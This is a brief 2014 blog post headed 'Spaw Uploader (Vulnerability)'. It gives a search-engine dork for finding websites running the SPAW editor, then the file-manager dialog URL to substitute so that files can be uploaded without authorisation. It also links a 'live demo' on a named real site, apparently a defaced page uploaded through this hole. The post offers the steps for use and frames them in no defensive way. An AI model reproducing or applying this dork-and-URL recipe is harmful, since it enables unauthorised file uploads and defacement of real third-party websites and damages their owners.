Sunday, June 29, 2014

Spaw Uploader (Vulnerability)

Dork:
inurl:”spaw2/uploads/files/”

Change spaw2/uploads/files/ to:

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Live Demo:

http://www.tieca.com/backoffice_tieca/spaw2/uploads/files/Crash_Hydra_Skull.html


No comments:

Post a Comment